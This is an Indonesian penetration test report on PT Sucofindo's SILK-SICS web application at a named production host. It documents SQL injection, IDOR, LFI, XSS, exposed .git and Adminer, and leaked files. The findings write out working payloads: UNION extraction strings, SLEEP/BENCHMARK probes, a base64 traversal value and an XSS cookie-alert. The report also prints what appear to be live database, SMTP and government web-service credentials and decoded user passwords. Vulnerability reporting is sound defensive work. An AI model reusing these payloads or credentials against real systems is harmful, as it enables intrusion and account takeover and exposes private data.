| Kontak | Role |
|---|---|
| Edho Ferdian Dwi Cahyo | Pentester |
| — | Reviewer |
| Versi | Deskripsi | Tanggal |
|---|---|---|
| 1.0 | Laporan awal pengujian penetrasi | 25 Agustus 2026 |
Pengujian keamanan dilakukan pada aplikasi web Sistem Informasi Legalitas Kayu (SILK-SICS) milik PT. Sucofindo pada tanggal 25 Agustus 2026. Tujuan pengujian adalah mengidentifikasi, mengevaluasi, dan mendokumentasikan kerentanan keamanan pada aplikasi tersebut. Pengujian dilakukan dengan pendekatan black-box dari sudut pandang pengguna anonim (tanpa autentikasi).
Laporan ini berisi rincian ruang lingkup, temuan celah keamanan, dan rekomendasi perbaikan. Ringkasan di bawah menyajikan gambaran umum non-teknis mengenai temuan dan dampaknya terhadap operasional perusahaan, dilanjutkan dengan penjelasan teknis untuk masing-masing kerentanan.
| No | Severity | Status | Deskripsi |
|---|---|---|---|
| 1 | CRITICAL | Open | SQL Injection (UNION-Based) pada lookup/HSLOV.php |
| 2 | CRITICAL | Open | SQL Injection Blind (Time-Based) pada lookup/showOutstanding.php |
| 3 | CRITICAL | Open | Broken Access Control — IDOR userList (1.325 Akun Bocor) |
| 4 | CRITICAL | Open | 108 Halaman Admin Dapat Diakses Tanpa Autentikasi |
| 5 | CRITICAL | Open | Adminer 4.8.1 Terekspos Publik + Kredensial Database Bocor |
| 6 | CRITICAL | Open | Kredensial Sensitif Tertanam di Source Code |
| 7 | CRITICAL | Open | Eksposur Direktori .git dan 23 File Source Code |
| 8 | CRITICAL | Open | Password Lemah, Monokultur, dan Tersimpan dalam Format Reversible |
| 9 | HIGH | Open | Local File Inclusion (LFI) pada Parameter pPage |
| 10 | HIGH | Open | Reflected Cross-Site Scripting (XSS) |
| 11 | HIGH | Open | Kebocoran Data 4.354 Perusahaan dan Jadwal Audit |
| 12 | HIGH | Open | Dokumen Internal Dapat Diunduh Tanpa Autentikasi |
| 13 | MEDIUM | Open | Kebocoran File Log Error (100 MB) dengan Dukungan Range Header |
| 14 | LOW | Open | Kebocoran Database Cache php_fast_cache (SQLite) |
| 15 | MEDIUM | Open | Penggunaan Komponen EOL dan Kesalahan Konfigurasi |
| 16 | HIGH | Open | Fitur Upload Tanpa Kontrol Akses (Rantai Menuju RCE) |
| 17 | INFORMATIONAL | Open | Hasil Positif: Penanganan RCE Sudah Cukup Baik (Hardening) |
Gambaran Umum Kerentanan: Dalam pengujian penetrasi ini, ditemukan 17 kerentanan, terdiri dari 8 Critical, 5 High, 2 Medium, 1 Low, dan 1 Informational. Kerentanan paling kritis berupa SQL Injection pada level root database yang memungkinkan pembacaan seluruh data, kebocoran 1.325 akun pengguna beserta password, serta kredensial database/SMTP/web-service pemerintah yang terekspos dari source code. Pengujian juga mengonfirmasi bahwa upaya eksekusi kode sewenang-wenang (RCE) berhasil diblokir oleh konfigurasi server yang ada.
Laporan ini mendokumentasikan hasil pengujian penetrasi dengan metode Black-box Testing. Tujuannya adalah mengidentifikasi dan memvalidasi temuan celah keamanan sesuai ruang lingkup yang ditentukan.
Secara umum, pengujian mengadopsi 4 fase berikut: reconnaissance, vulnerability identification, exploitation, dan reporting.
Pengujian penetrasi aplikasi web dapat dilakukan dengan tiga pendekatan utama — blackbox, greybox, dan whitebox — yang dibedakan berdasarkan jumlah informasi dan akses yang diberikan kepada penguji.
| Ruang Lingkup | Target |
|---|---|
| Website | https://silk.sucofindo.co.id |
| Alamat IP | 35.219.52.208 (port publik: 80, 443) |
| Metode | Black-box, unauthenticated |
| Batasan | Tidak melakukan login, tidak mengubah data produksi, tidak meninggalkan file |
| Score | 9.8 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Parameter pFilter pada halaman lookup/HSLOV.php (metode POST) digabungkan langsung ke dalam query SQL tanpa sanitasi: SELECT ... FROM msths WHERE kode_hs LIKE '%{pFilter}%'. Kerentanan ini terkonfirmasi sebagai SQL Injection berbasis UNION dengan struktur query 4 kolom. Query tereksekusi sebagai user root@172.18.0.3 (MySQL 5.7.44 dalam container Docker), sehingga penyerang dapat membaca seluruh isi database.
Bukti (Evidence):
POST /lookup/HSLOV.php
pFilter=48' UNION SELECT @@version,2,3,4-- - → hasil: MySQL 5.7.44
pFilter=48' UNION SELECT @@version,@@datadir,current_user(),@@hostname-- - → root@172.18.0.3
pFilter=48' UNION SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema='prod_dbvlegal'-- -
pFilter=48' UNION SELECT GROUP_CONCAT(userID),2,3,4 FROM admuser-- - → berhasil mengekstrak data user
Dampak (Impact):
Rekomendasi: Gunakan prepared statement / parameterized query untuk seluruh parameter. Terapkan prinsip least-privilege pada akun database (jangan root), batasi host koneksi, dan aktifkan audit log database.
Referensi:
| Score | 9.8 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Parameter pAreaKerja pada halaman lookup/showOutstanding.php (metode GET) rentan terhadap SQL Injection tipe blind. Penyisipan kutip tunggal merusak query, sedangkan fungsi SLEEP() dan BENCHMARK() terbukti benar-benar dieksekusi oleh server, menandakan bahwa input pengguna masuk langsung ke dalam query SQL.
Bukti (Evidence):
GET /lookup/showOutstanding.php?pAreaKerja=1' AND SLEEP(3) AND '1'='1
→ waktu respons 20+ detik (normal: 0,17 detik)
GET /lookup/showOutstanding.php?pAreaKerja=1' AND BENCHMARK(3000000,SHA1(1)) AND '1'='1
→ 2,12 detik (konfirmasi eksekusi query)
GET /lookup/showOutstanding.php?pAreaKerja=x' OR '1'='9 → 899 byte vs OR '1'='1 → 902 byte (boolean)
Dampak (Impact):
Rekomendasi: Validasi parameter numerik (misalnya intval()) dan gunakan prepared statement. Pasang WAF/ModSecurity dengan deteksi payload berbasis waktu (SLEEP/BENCHMARK).
Referensi:
| Score | 9.1 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Halaman manajemen pengguna userList dapat diakses langsung tanpa sesi autentikasi. Seluruh data pengguna—username, deskripsi, password (dalam format base64), grup, dan email—dirender penuh oleh server. Terdapat 1.325 akun yang terekspos.
Bukti (Evidence):
GET /index.php?pPage=dXNlckxpc3Q,, (base64 dari 'userList', karakter '=' diganti ',')
GET /SILK_LAMA/?pPage=dXNlckxpc3Q=
→ Respons 1.250.412 byte berisi 1.325 akun.
Contoh terverifikasi: administrator/backspace · user-admin/jkt2024 · su-hendy/biji
Dampak (Impact):
Rekomendasi: Terapkan pemeriksaan sesi dan role di seluruh handler halaman (bukan hanya menu). Rotasi seluruh password pengguna dan hentikan penyimpanan password tanpa hashing.
Referensi:
| Score | 9.1 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Probing terhadap 479 file PHP menemukan 108 halaman yang me-render konten lengkap tanpa sesi login. Termasuk di dalamnya form pembuatan pengguna (userForm), broadcast email massal (pBroadcastEmailMessage), form permohonan dokumen (tMohonForm), dan berbagai halaman laporan.
Bukti (Evidence):
GET /index.php?pPage=dXNlckZvcm0s, → userForm (13.329 byte)
GET /index.php?pPage=cEJyb2FkY2FzdEVtYWlsTWVzc2FnZQ,,, → pBroadcastEmailMessage (166.013 byte)
GET /index.php?pPage=dE1vaG9uRm9ybQ,, → tMohonForm (56.604 byte)
Semua halaman dirender tanpa cookie/sesi.
Dampak (Impact):
Rekomendasi: Implementasikan middleware autentikasi global (bootstrap) yang memeriksa sesi dan role di setiap halaman, bukan hanya pemeriksaan parsial seperti sInfoLogin==''.
Referensi:
| Score | 9.8 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Alat manajemen database Adminer versi 4.8.1 dapat diakses publik melalui /adminer.php. Apabila dikombinasikan dengan kredensial database root yang bocor dari source code (lihat L6), penyerang dapat membuka antarmuka SQL penuh terhadap database produksi.
Bukti (Evidence):
GET /adminer.php → halaman login Adminer 4.8.1 (terekspos publik)
Kredensial dari source code (L6): server=mysql_app · user=root · pass=adm@DB#silk25 · db=prod_dbvlegal
Login TIDAK dicoba selama pengujian (sesuai batasan ruang lingkup).
Dampak (Impact):
Rekomendasi: Hapus Adminer dari akses publik atau batasi hanya dari VPN/IP internal dengan proteksi basic-auth. Ganti seluruh kredensial yang bocor dan perbarui Adminer ke versi terbaru.
Referensi:
| Score | 9.8 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Kredensial hardcoded ditemukan pada file include/cnFile.php dan include/xFile.php (versi 2018–2023) yang terekspos melalui kebocoran source code (L7). Kredensial tersebut mencakup database produksi, server email, dan web service Kementerian Lingkungan Hidup dan Kehutanan (LIU).
Bukti (Evidence):
MySQL : mysql_app / root / adm@DB#silk25 / prod_dbvlegal (aktif — dikonfirmasi via SQLi)
SMTP : 172.16.100.245:587 TLS / admin-silk / adm@SILK#2019 (aktif di fungsi fAutoEmail)
WS LIU : liu.dephut.go.id + silk.menlhk.go.id / SucofindoICS / sics2012
Kredensial lama pada komentar: fernando/fernando · admin/adm@silk#sucofindo
Dampak (Impact):
Rekomendasi: Pindahkan seluruh rahasia ke environment variable atau secret manager. Rotasi semua kredensial yang bocor segera, dan pasang secret scanning pada pipeline pengembangan.
Referensi:
| Score | 9.1 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Direktori .git/ dapat dibaca publik (config, index berisi 1.165 path file proyek). Karena nginx menyajikan file ber-ekstensi non-.php secara statis, 23 file source code asli (total 1,9 MB, termasuk 14 versi xFile.php) berhasil diunduh.
Bukti (Evidence):
GET /.git/config → origin gitlab.com/repository/app.git (repository private bocor)
GET /.git/index → daftar 1.165 path file proyek
GET /include/xFile.php-2021-03-18 → source code lengkap (ekstensi tambahan disajikan statis)
Sebanyak 23 file source berhasil dikumpulkan (1,9 MB).
Dampak (Impact):
Rekomendasi: Hapus direktori .git dari webroot. Blokir ekstensi sumber (mis. .php-*, ~, .default) pada konfigurasi nginx. Terapkan gitignore yang benar dan secret scanning pada repository.
Referensi:
| Score | 9.1 (Critical) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Password pengguna disimpan sebagai base64 (dapat dibalik) melalui fungsi fEnc() (base64 dengan karakter '=' diganti ','), bukan hash. Selain itu banyak akun berbagi password default yang sama (biji), termasuk akun bergrup Super User.
Bukti (Evidence):
Hasil ekstraksi via SQLi (decode base64):
administrator / backspace (G001) · user-admin / jkt2024 (G010 - Super User)
su-hendy / biji (G010) · test / biji (G010) · testing / biji (G001)
Password 'biji' dipakai oleh puluhan akun lain.
Dampak (Impact):
Rekomendasi: Ganti mekanisme penyimpanan dengan hashing modern (bcrypt/argon2). Terapkan kebijakan password kuat dan rotasi massal. Aktifkan multi-factor authentication untuk akun admin.
Referensi:
| Score | 8.6 (High) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Router indexa.php mengeksekusi include("page/".$pPage.".php") dengan nilai pPage berasal dari input pengguna (terenkode base64). Traversal direktori ../ terbukti berfungsi sehingga file PHP lain dapat di-include dan dieksekusi.
Bukti (Evidence):
pPage=Li4vaW5kZXhh (base64 dari '../indexa')
→ include & eksekusi indexa.php tanpa sesi autentikasi
Memicu rekursi 14,5 MB (2.141 blok DOCTYPE) — konfirmasi eksekusi PHP berhasil.
Dampak (Impact):
Rekomendasi: Terapkan whitelist nilai pPage dan hindari membangun path dari input pengguna. Batasi include hanya pada direktori page/ yang sah.
Referensi:
| Score | 7.4 (High) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Parameter pada lookup/mobileTrial.php (pField01–pField06) dan lookup/HSLOV.php (pFilter) direfleksikan tanpa escaping ke dalam atribut value. Penyerang dapat menyisipkan atribut/event handler JavaScript yang tereksekusi di browser korban.
Bukti (Evidence):
GET /lookup/mobileTrial.php?pField01=' autofocus onfocus=alert(document.cookie) '
→ tereksekusi otomatis saat halaman dimuat
Breakout atribut tervalidasi: value='1' onmouseover='alert(1)'
value=''>
Dampak (Impact):
Rekomendasi: Lakukan HTML-encoding pada seluruh output. Terapkan Content-Security-Policy (CSP), gunakan framework dengan auto-escaping, dan set cookie dengan flag HttpOnly + Secure.
Referensi:
| Score | 7.5 (High) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Halaman mPublikasiRencanaAuditList me-render daftar lengkap perusahaan pemegang izin beserta alamat, lingkup audit, jadwal, dan status hasil audit — tanpa autentikasi. Total terdata 4.354 perusahaan.
Bukti (Evidence):
POST /index.php?pPage=mPublikasiRencanaAuditList → 'Jumlah Record: 1-10 dari 4354'
Contoh baris: CV ABOVEE ABADI | alamat lengkap | PBUI | Sertifikasi 2026-07-15 s/d 17 | LULUS
PT. MITRA KARYAUSAHA SEJAHTERA | IUI-SEKUNDER | 2016-08-15
Dampak (Impact):
Rekomendasi: Batasi akses halaman ini hanya pada sesi yang sah dengan pemeriksaan role, dan jangan tampilkan alamat lengkap di halaman publik.
Referensi:
| Score | 7.5 (High) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Halaman tDownloadDokumenList menampilkan daftar dokumen internal beserta tautan langsung pada /files/*. Seluruh file tersebut dapat diunduh tanpa autentikasi, termasuk PDF V-Legal, berita acara, dan dokumen serah terima blanko.
Bukti (Evidence):
GET /files/BA_KIRIM_BLANKO_CABANG_587. VLEGAL587.BA-VI.JKT.2026 (PT Hyun Jin...)_OK.pdf
→ 200 OK, 338.061 byte, application/pdf (terunduh tanpa login)
Pola penamaan upload: {source}_{nama asli}
Dampak (Impact):
Rekomendasi: Wajibkan autentikasi untuk seluruh unduhan. Simpan dokumen di luar docroot dan layani melalui endpoint terotorisasi; jangan gunakan nama file asli pada URL.
Referensi:
| Score | 5.3 (Medium) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: File report/error_log berukuran 100 MB dapat diakses publik. Nginx mendukung header Range, sehingga penyerang dapat membaca irisan mana pun dari file tersebut.
Bukti (Evidence):
GET /report/error_log
Range: bytes=-300 → HTTP 206 Partial Content, isi log periode 2015–2019 terbaca
Mengungkap path lama /home/prod/public_html/ (host OpenVZ prod.silk-sucofindo.biz)
Dampak (Impact):
Rekomendasi: Hapus file log dari docroot dan alihkan logging ke luar webroot. Matikan display_errors di produksi dan terapkan logrotate.
Referensi:
| Score | 3.9 (Low) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: File include/cache.storage/pdo.caching merupakan database SQLite (41 KB) yang dapat diunduh utuh. File ini berisi 47 entry cache GeoIP pengunjung (April 2015) serta informasi konfigurasi sistem pada file *.cache.ini.
Bukti (Evidence):
GET /include/cache.storage/pdo.caching → SQLite 3.x, 47 baris tabel 'objects'
Contoh entry: 202.62.16.169 → Indonesia, Jakarta Raya (14 April 2015)
config.*.cache.ini → kernel Linux prod.silk-sucofindo.biz 2.6.32-042stab (2015)
Dampak (Impact):
Rekomendasi: Pindahkan cache ke luar docroot, blokir akses ke direktori cache.storage, dan perbarui library cache.
Referensi:
| Score | 5.3 (Medium) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Aplikasi berjalan pada PHP 5.6.40 yang sudah End-of-Life (EOL), dengan display_errors=On, CAPTCHA statis yang dapat di-bypass (cap1==cap2), serta pemeriksaan sesi yang lemah. Kode sumber juga mengindikasikan SQL injection lain (pPJTNotes) dan fungsi hapus file tanpa autentikasi kuat.
Bukti (Evidence):
X-Powered-By: PHP/5.6.40 (EOL)
Halaman error menampilkan path absolut (display_errors ON)
CAPTCHA divalidasi client-side: cap1 dibandingkan dengan cap2 di JavaScript
Source: unlink($_REQUEST['pLokasiINS']) tanpa pemeriksaan otorisasi
Dampak (Impact):
Rekomendasi: Upgrade ke versi PHP 8.x yang masih didukung. Matikan display_errors di produksi, ganti CAPTCHA dengan validasi server-side, dan terapkan mekanisme sesi + role yang terpusat.
Referensi:
| Score | 8.8 (High) |
|---|---|
| Vector string | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Form upload pada tUploadRekapitulasi (4 input file) dan forumContent me-render tanpa autentikasi. Whitelist ekstensi pada tUploadRekapitulasi belum dapat diverifikasi dari source code. Apabila tidak ada whitelist, upload file .php akan menghasilkan eksekusi kode sewenang-wenang (RCE). Ini merupakan rantai serangan paling praktis menuju kompromi penuh server.
Bukti (Evidence):
GET /index.php?pPage=dFVwbG9hZFJla2FwaXR1bGFzaQ,, → form multipart dengan 4 input file
Field: pFileRekapLMK · pFileRekapSKSHH · pFileRekapPEB · pFileRekapLAINNYA + tombol pUpload
GET /index.php?pPage=Zm9ydW1Db250ZW50 → form multipart (pSimpan)
Upload TIDAK dilakukan selama pengujian (batasan ruang lingkup).
Dampak (Impact):
Rekomendasi: Terapkan autentikasi dan otorisasi pada seluruh handler upload. Validasi ekstensi, MIME, dan magic-bytes; simpan file di luar docroot dengan nama acak; layani unduhan melalui endpoint terotorisasi.
Referensi:
| Score | 0.0 (Informational) |
|---|---|
| Vector string | - |
| Target | https://silk.sucofindo.co.id |
| Status | Open |
Deskripsi: Sebanyak 12 vektor menuju RCE diuji selama pengujian dan seluruhnya berhasil diblokir oleh konfigurasi server, antara lain: INTO OUTFILE/DUMPFILE, LOAD_FILE, stacked query, CVE-2019-11043 (sudah di-patch di PHP 5.6.40), CVE-2012-1823 (PHP-FPM bukan CGI), CVE-2016-10033 PHPMailer (aplikasi memakai SMTP), PEARCMD, wrapper php://, log/session poisoning, upload .php, dan port yang terbuka hanya 80/443. Verifikasi akhir memastikan tidak ada file yang tertinggal di server.
Bukti (Evidence):
SQLi→OUTFILE: seluruh path ditolak (secure_file_priv=/var/lib/mysql-files/)
SQLi→LOAD_FILE: NULL di semua path; stacked query tidak didukung mysqli_query
Port scan: hanya 80 dan 443 yang terbuka
Tidak ada artefak file tersisa di server (diverifikasi)
Dampak (Impact):
Rekomendasi: Pertahankan konfigurasi hardening saat ini, dokumentasikan sebagai baseline, dan tetap tutup jalur RCE yang tersisa melalui perbaikan L5/L6/L16.
Referensi:
Penilaian menggunakan Common Vulnerability Scoring System (CVSS) versi 3.1, kerangka kerja standar untuk mengukur tingkat keparahan kelemahan keamanan. Setiap kerentanan diberi skor antara 0 dan 10; semakin tinggi skor, semakin parah masalahnya. Sistem ini membantu organisasi memutuskan ancaman mana yang perlu mendapat prioritas penanganan.
| CVSS Score | Severity | Deskripsi |
|---|---|---|
| 9.0 – 10.0 | Critical | Kerentanan paling berbahaya, biasanya memungkinkan eksploitasi meluas dengan dampak parah, seperti kehilangan data dan pengambilalihan sistem secara menyeluruh. |
| 7.0 – 8.9 | High | Kerentanan yang dapat memungkinkan akses atau kendali tidak sah atas sistem yang terpengaruh. |
| 4.0 – 6.9 | Medium | Kerentanan yang dapat menyebabkan pengaksesan data terbatas atau dapat dikombinasikan dengan kelemahan lain untuk mendapatkan akses yang tidak diinginkan. |
| 0.1 – 3.9 | Low | Kerentanan yang mungkin tidak dapat dieksploitasi langsung, tetapi menimbulkan kelemahan yang tidak perlu pada aplikasi atau sistem. |
| 0.0 | Informational | Informasi yang mungkin bernilai, tetapi tidak teridentifikasi sebagai kerentanan. |
Dokumen ini berisi informasi yang sangat rahasia dan dilindungi oleh undang-undang. Informasi yang terdapat dalam dokumen ini hanya ditujukan untuk penerima yang ditentukan dan tidak boleh disebarluaskan, didistribusikan, atau disalin tanpa izin tertulis dari pihak yang berwenang. Kredensial yang muncul dalam laporan ini merupakan hasil verifikasi dampak dalam lingkup pengujian yang disetujui.